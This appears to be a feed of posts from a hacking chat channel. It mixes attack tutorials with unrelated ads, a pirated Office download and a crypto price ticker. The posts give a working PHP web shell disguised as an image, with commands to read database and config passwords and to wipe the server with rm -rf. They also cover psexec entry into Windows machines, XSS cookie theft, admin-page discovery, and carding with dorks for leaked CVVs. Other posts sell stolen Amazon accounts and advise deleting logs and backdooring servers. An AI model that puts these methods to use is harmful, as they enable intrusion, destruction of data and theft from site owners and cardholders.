UNA FAMILIA GRANDE [ONE BIG FAMILY]
first of all welcome to the group
hackers are bound together, there are no boundaries
whether you are black or white, short or tall, male or female.
we all hack for one reason: to make the world a better place
so if you are learning just to commit crimes then you should probably turn back now.
you may have already learnt about black and whitehats
but i want you to know that when hacking started, all they wanted was to expose the greed and corruption of people in the world
they destroyed the face of hacking by calling the people who exposed them blackhats
then they said, why don we learn from them so we can make our networks secure to protect the monies we steal
lets all ourselfs the whitehats so people hate them and run to us
you have to understand that there are no blackhats, we are just hackers
hacking to make the world a better place
#hack_teh_world
#occupy_the_web
~halozorayo

Anyone can exchange Cash App $ to Bitcoin Or paypal? Inbox me @anonyguy

guys i have stopped teaching pentesting to focus on forensics and social engineering
i will make a new series teaching you how operating systems work
i wont teach you how to make one because mine programming skills are very bad
stay tuned
~halozorayo

VULNERABILITIES AND EXPLOITZ
What is a vulnerability??
Simply it's what helps you to hack a site
For example if you change a parameter from &s=1 to &s=<img src='javascript:promt("xss");'> and you see a box with xss then the site is vulnerable
Similarly, if you change it to &s=' and you get an error
You have an error in your SQL syntax it means that the site can be SQL injected
PS. This doesn't mean you have hacked the site, it just means that you have checked and found out that the site can be hacked.
But that's it
What is an exploit?
An exploit is a piece of code that takes advantage of a vulnerability to get you into the site
Let's say you found an xss bug in a site
The next question is how can I use it to hack the site?
What I would do is send it to the admin of the site so that when he clicks my link, I can steal his cookie and use it to log in as him.
Pwned!
I am now an admin of the site
Classic privilege escalation
Sweet isn't it?
Questions?
@anonyguy
~halozorayo

HACKING THE WEB
FINALE
using psexec to hack into windows
this is a tool for login to windows
before you continue, go to google and download sysinternals.
look for psexec.exe and put it on your desktop
now open cmd and lets start hacking...
cd desktop
before you use the tool, you need the username and password of your victim
but a lot of users don have a password on the Administrator account so we can hack them without a password
psexec \\192.168.1.1 -u Administrator cmd.exe
i hope you can see that i am using it to connect to an ip address with a username administrator and run cmd
when it works, you can start using cmd to control their pc
i hope you learnt how to use it
if you need more info on this tool just google psexec and learn more about it
thats it
have fun
~halozorayo

HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
happy hacking
~halozorayo
Join us @Techbyte

BTC $6,472.934 (0.1%)
ETH $203.435 (0.1%)
XRP $0.456 (-0.5%)
BCH $436.938 (-0.5%)
EOS $5.375 (-0.1%)
XLM $0.232 (0.1%)
LTC $51.865 (-0.5%)
USDT $0.990 (0.2%)
ADA $0.073 (0.0%)
XMR $104.224 (-1.6%)

Million Musk March + Op_Crack_Financial_Sectors
On the 5th November Ghandi Square
Remember Anonymous location is Johannesburg Ghandi Square, those who won't be able to attend we will be streaming online and those joining up on the operation it will be online, all the targets will be posted here on channel, thank you. We are an idea. -I don't have mask.. how can I get it?at Amazon for four dollars/You can also get them at Arts&Crafts markets in your city/ if you go to big march early many will be handing them out . - how can i show the live stream? by live stream using social media such as Google hangouts, YouTube and few others and a video will be taken for those who are not able to stream online, the video will be posted in all of our social medias. any question ? @anonyguy

FREE GIVEAWAY
add these to the end of a url to find the admin page of the site you want to hack
take a site like ballot.org and add any of these until you find the administration page
/admin/
/administrator/
/webadmin/
/adminarea/
/bb_admin/
/admin_area/
/panel-administration/
/memberadmin/
/administratorlogin/
/adm/
/admin/account.asp
/admin/index.asp
/administrator/account.html
/administrator.html
/moderator/admin.html
/admin_login.html
/panel-administrathon/login.html
/admin/home.asp
/admin.asp
/admin/controlpanel.asp
homework:
doing this manually can be tiresome
write code in any scripting language of your choice to do this for you (perl python or ruby)
tip:
the first argument (argv[0]) should be the name of the site to hack
then write a loop which tries to connect to the url and returns if it gets a 404(not found) else prints the url
~halo😊@anonyguy

Hi, I joined Kilimall's Black Friday 2018 Bargain Activity. You can bargain items and get them for free. That's right, Ksh 0, click the link below for more:

https://m.kilimall.co.ke/bargain/share?id=K1811011835466713371&aid=K1809261419257721515

SOFTWARE MAKES YOU VULNERABLE
if you were to give most hackers a fresh windows7 installation for then to hack, it will be impossible to hack
but people are still getting hacked
how?
last year a backdoor was found in ccleaner that enabled people to hack your pc or phone
most hackers embed their payloads in pdf and microsoft word files
many browsers are hacked because of adobe flash vulnerabilities
the answer is third party software
anyone who downloaded ccleaner now know they made it easier to get hacked
the more apps you have, the easier it is to hack you
here are some
microsoft office
adobe flash
adobe reader
java
ccleaner
just to name a few
thats why you need to know which software your target has for a successful hack
thats also why websites are easier to hack
because they have many software installed like php and joomla
be careful of some of the software you download
just because you have an antivirus or firewall doesnt mean you cant be hacked
stay safe
~haloorayo

WHILE I WAS AWAY
there was this crap site i wanted to hack they thought they were secure so i just searched google for the site uploads
eg. hak.me upload
and i found it
i had to fill a form and upload it
i found a crap image and uploaded it
then i clicked on the image after the "please wait for the results" page
it turns out that it was stored in
hak.me/uploads/
and they didnt change the name of the image
so,
i opened my windows vm and copied cmd.exe to linux
then i disabled javascript in my browser else it will say "image not valid" and filled the form again but this time uploading cmd.exe
bingo! now i had a shell
but thats just a vulnerability
so the exploit is
this is how i changed the url
hak.me/uploads/cmd.exe?/c+my_commands
;)
now i found credit card details, passwords etc
hmm...
i knew i couldnt access their cmd so i uploaded my own
sweet logic!
don forget my project
~halo
zorayo

MAKING MONEY ON THE WEB THE BLACK HAT WAY PART 1
CARDING
[don forget to share]
how do black hats make money?
hacking banks? no
there is an easy way to find credit cards online to shop and ship
[by the way, i am not black hat]
what do we need?
a 32gb pc? no. google, yes only google so pick up your phone and go to google.com
lets look for 2018 credit cards
type:
inurl:pastebin intext:CVV 2018
and the first link gives me 1000 working credit cards which i can use to shop online
Disclaimer: i am not responsible if you get caught
by the way its fun to know how to hack but there is a difference between knowing how to hack and breaking the law
so stay safe
~halozorayo
Join @Techbyte for more Posts.
IB me for any Quet @anonyguy

Microsoft Office 2019 Profesional Plus v1808 b10730.20102 Retail x86x64.

Contains both 32bit and 64bit. Download all parts.
Part 1 of 3.
@vortechpc

Microsoft Office 2019 Profesional Plus v1808 b10730.20102 Retail x86x64.

Contains both 32bit and 64bit. Download all parts.
Part 2 of 3.
@vortechpc

Microsoft Office 2019 Profesional Plus v1808 b10730.20102 Retail x86x64.

Contains both 32bit and 64bit. Download all parts.
Part 3 of 3.
@vortechpc

Amazon accounts are with only E-MAIL access! Do a password reset to enter Amazon account. Balance = last order price. We always care for customers and because of amazon's security updates, please check account details after a purchase (you will get detailed instructions, how to avoid account locks and etc).




Refund time: 5 mins (because accounts are fresh and checking every day)

inbox @anonyguy


All email - valid, need use only good and clear socks or rdp!

Example of how a philosophy dialogue can be used to develop ideas
how do i gain access to a company server
you can start with a port scan to find open ports you can use to enter the network
what if i find a port open
log into the port using default usernames and passwords
try a dictionary attack
what if a port is not open
you can use psexec or social engineering
ok now that i am in what do i do
check if you are root or admin
what if i am
congratulation
what if i am not
use privilege escalating techniques to become root
how?
search for it on google
ok, now that i am root what do i do
why did you hack? if for fun then mission accomplished
if you are looking for a file to steal use the locate command on linux or dir c: /os /d in windows
after that?
delete your logs
you can use the locate command to search for it and delete it using rm *
wow thanks
its a good idea to backdoor the server so that you don go through hell next time you want to hack the same machine
thanks
~halozorayo

Stickers have finally arrived on WhatsApp! We bring you a fantastic application with which you can share stickers with your WhatsApp friends. We offer you assorted sticker packs so you can choose the one you like best. Video games, pets, celebrities, TV series, emojis and much more. What are you waiting for?

You are one step away from downloading one of the best stickers apps for WhatsApp in the market. Creativity and 100% security. You will have at your disposal an app that is constantly evolving and that will offer you more stickers in the future.

You can use packs of so many sets of Emoji Faces to express your mood with your WhatsApp contacts, among others. We use themes that are recognized worldwide. If you have any requirement or you miss something, do not hesitate to leave us a comment.

Download it, we are waiting for you!

Compatible with the new WhatsApp

https://play.google.com/store/apps/details?id=com.gigabytedevelopersinc.apps.whatsapp.stickers

EASTER EGG

If you search "Excelsior" on Netflix, all Marvel TV shows and movies show up.

This is in tribute to the late Stan "The Man" Lee.

@techBYTE